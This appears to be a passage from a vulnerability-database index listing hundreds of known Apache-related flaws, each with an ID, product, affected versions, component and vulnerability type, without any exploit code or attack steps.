8101| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
8102| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
8103| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
8104| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
8105| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
8106| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
8107| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
8108| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
8109| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
8110| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
8111| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
8112| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
8113| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
8114| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
8115| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
8116| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
8117| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
8118| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
8119| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
8120| [82076] Apache Ranger up to 0.5.1 privilege escalation
8121| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
8122| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
8123| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
8124| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
8125| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
8126| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
8127| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
8128| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
8129| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
8130| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
8131| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
8132| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
8133| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
8134| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
8135| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
8136| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
8137| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
8138| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
8139| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
8140| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
8141| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
8142| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
8143| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
8144| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
8145| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
8146| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
8147| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
8148| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
8149| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
8150| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
8151| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
8152| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
8153| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
8154| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
8155| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
8156| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
8157| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
8158| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
8159| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
8160| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
8161| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
8162| [79791] Cisco Products Apache Commons Collections Library privilege escalation
8163| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
8164| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
8165| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
8166| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
8167| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
8168| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
8169| [78989] Apache Ambari up to 2.1.1 Open Redirect
8170| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
8171| [78987] Apache Ambari up to 2.0.x cross site scripting
8172| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
8173| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
8174| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
8175| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
8176| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
8177| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
8178| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
8179| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
8180| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
8181| [77406] Apache Flex BlazeDS AMF Message XML External Entity
8182| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
8183| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
8184| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
8185| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
8186| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
8187| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
8188| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
8189| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
8190| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
8191| [76567] Apache Struts 2.3.20 unknown vulnerability
8192| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
8193| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
8194| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
8195| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
8196| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
8197| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
8198| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
8199| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
8200| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
8201| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
8202| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
8203| [74793] Apache Tomcat File Upload denial of service
8204| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
8205| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
8206| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
8207| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
8208| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
8209| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
8210| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
8211| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
8212| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
8213| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
8214| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
8215| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
8216| [74468] Apache Batik up to 1.6 denial of service
8217| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
8218| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
8219| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
8220| [74174] Apache WSS4J up to 2.0.0 privilege escalation
8221| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
8222| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
8223| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
8224| [73731] Apache XML Security unknown vulnerability
8225| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
8226| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
8227| [73593] Apache Traffic Server up to 5.1.0 denial of service
8228| [73511] Apache POI up to 3.10 Deadlock denial of service
8229| [73510] Apache Solr up to 4.3.0 cross site scripting
8230| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
8231| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
8232| [73173] Apache CloudStack Stack-Based unknown vulnerability
8233| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
8234| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
8235| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
8236| [72890] Apache Qpid 0.30 unknown vulnerability
8237| [72887] Apache Hive 0.13.0 File Permission privilege escalation
8238| [72878] Apache Cordova 3.5.0 cross site request forgery
8239| [72877] Apache Cordova 3.5.0 cross site request forgery
8240| [72876] Apache Cordova 3.5.0 cross site request forgery
8241| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
8242| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
8243| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
8244| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
8245| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
8246| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
8247| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
8248| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
8249| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
8250| [71629] Apache Axis2/C spoofing
8251| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
8252| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
8253| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
8254| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
8255| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
8256| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
8257| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
8258| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
8259| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
8260| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
8261| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
8262| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
8263| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
8264| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
8265| [70809] Apache POI up to 3.11 Crash denial of service
8266| [70808] Apache POI up to 3.10 unknown vulnerability
8267| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
8268| [70749] Apache Axis up to 1.4 getCN spoofing
8269| [70701] Apache Traffic Server up to 3.3.5 denial of service
8270| [70700] Apache OFBiz up to 12.04.03 cross site scripting
8271| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
8272| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
8273| [70661] Apache Subversion up to 1.6.17 denial of service
8274| [70660] Apache Subversion up to 1.6.17 spoofing
8275| [70659] Apache Subversion up to 1.6.17 spoofing
8276| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
8277| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
8278| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
8279| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
8280| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
8281| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
8282| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
8283| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
8284| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
8285| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
8286| [69846] Apache HBase up to 0.94.8 information disclosure
8287| [69783] Apache CouchDB up to 1.2.0 memory corruption
8288| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
8289| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
8290| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
8291| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
8292| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
8293| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
8294| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
8295| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
8296| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
8297| [69431] Apache Archiva up to 1.3.6 cross site scripting
8298| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
8299| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
8300| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
8301| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
8302| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
8303| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
8304| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
8305| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
8306| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
8307| [66739] Apache Camel up to 2.12.2 unknown vulnerability
8308| [66738] Apache Camel up to 2.12.2 unknown vulnerability
8309| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
8310| [66695] Apache CouchDB up to 1.2.0 cross site scripting
8311| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
8312| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
8313| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
8314| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
8315| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
8316| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
8317| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
8318| [66356] Apache Wicket up to 6.8.0 information disclosure
8319| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
8320| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
8321| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
8322| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
8323| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
8324| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
8325| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
8326| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
8327| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
8328| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
8329| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
8330| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
8331| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
8332| [65668] Apache Solr 4.0.0 Updater denial of service
8333| [65665] Apache Solr up to 4.3.0 denial of service
8334| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
8335| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
8336| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
8337| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
8338| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
8339| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
8340| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
8341| [65410] Apache Struts 2.3.15.3 cross site scripting
8342| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
8343| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
8344| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
8345| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
8346| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
8347| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
8348| [65340] Apache Shindig 2.5.0 information disclosure
8349| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
8350| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
8351| [10826] Apache Struts 2 File privilege escalation
8352| [65204] Apache Camel up to 2.10.1 unknown vulnerability
8353| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
8354| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
8355| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
8356| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
8357| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
8358| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
8359| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
8360| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
8361| [64722] Apache XML Security for C++ Heap-based memory corruption
8362| [64719] Apache XML Security for C++ Heap-based memory corruption
8363| [64718] Apache XML Security for C++ verify denial of service
8364| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
8365| [64716] Apache XML Security for C++ spoofing
8366| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
8367| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
8368| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
8369| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
8370| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
8371| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
8372| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
8373| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
8374| [64485] Apache Struts up to 2.2.3.0 privilege escalation
8375| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
8376| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
8377| [64467] Apache Geronimo 3.0 memory corruption
8378| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
8379| [64457] Apache Struts up to 2.2.3.0 cross site scripting
8380| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
8381| [9184] Apache Qpid up to 0.20 SSL misconfiguration
8382| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
8383| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
8384| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
8385| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
8386| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
8387| [8873] Apache Struts 2.3.14 privilege escalation
8388| [8872] Apache Struts 2.3.14 privilege escalation
8389| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
8390| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
8391| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
8392| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
8393| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
8394| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
8395| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
8396| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
8397| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
8398| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
8399| [64006] Apache ActiveMQ up to 5.7.0 denial of service
8400| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
8401| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
8402| [8427] Apache Tomcat Session Transaction weak authentication
8403| [63960] Apache Maven 3.0.4 Default Configuration spoofing
8404| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
8405| [63750] Apache qpid up to 0.20 checkAvailable denial of service
8406| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
8407| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
8408| [63747] Apache Rave up to 0.20 User Account information disclosure
8409| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
8410| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
8411| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
8412| [7687] Apache CXF up to 2.7.2 Token weak authentication
8413| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
8414| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
8415| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
8416| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
8417| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
8418| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
8419| [63090] Apache Tomcat up to 4.1.24 denial of service
8420| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
8421| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
8422| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
8423| [62833] Apache CXF -/2.6.0 spoofing
8424| [62832] Apache Axis2 up to 1.6.2 spoofing
8425| [62831] Apache Axis up to 1.4 Java Message Service spoofing
8426| [62830] Apache Commons-httpclient 3.0 Payments spoofing
8427| [62826] Apache Libcloud up to 0.11.0 spoofing
8428| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
8429| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
8430| [62661] Apache Axis2 unknown vulnerability
8431| [62658] Apache Axis2 unknown vulnerability
8432| [62467] Apache Qpid up to 0.17 denial of service
8433| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
8434| [6301] Apache HTTP Server mod_pagespeed cross site scripting
8435| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
8436| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
8437| [62035] Apache Struts up to 2.3.4 denial of service
8438| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
8439| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
8440| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
8441| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
8442| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
8443| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
8444| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
8445| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
8446| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
8447| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
8448| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
8449| [61229] Apache Sling up to 2.1.1 denial of service
8450| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
8451| [61094] Apache Roller up to 5.0 cross site scripting
8452| [61093] Apache Roller up to 5.0 cross site request forgery
8453| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
8454| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
8455| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
8456| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
8457| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
8458| [60708] Apache Qpid 0.12 unknown vulnerability
8459| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
8460| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
8461| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
8462| [4882] Apache Wicket up to 1.5.4 directory traversal
8463| [4881] Apache Wicket up to 1.4.19 cross site scripting
8464| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
8465| [60352] Apache Struts up to 2.2.3 memory corruption
8466| [60153] Apache Portable Runtime up to 1.4.3 denial of service
8467| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
8468| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
8469| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
8470| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
8471| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
8472| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
8473| [4571] Apache Struts up to 2.3.1.2 privilege escalation
8474| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
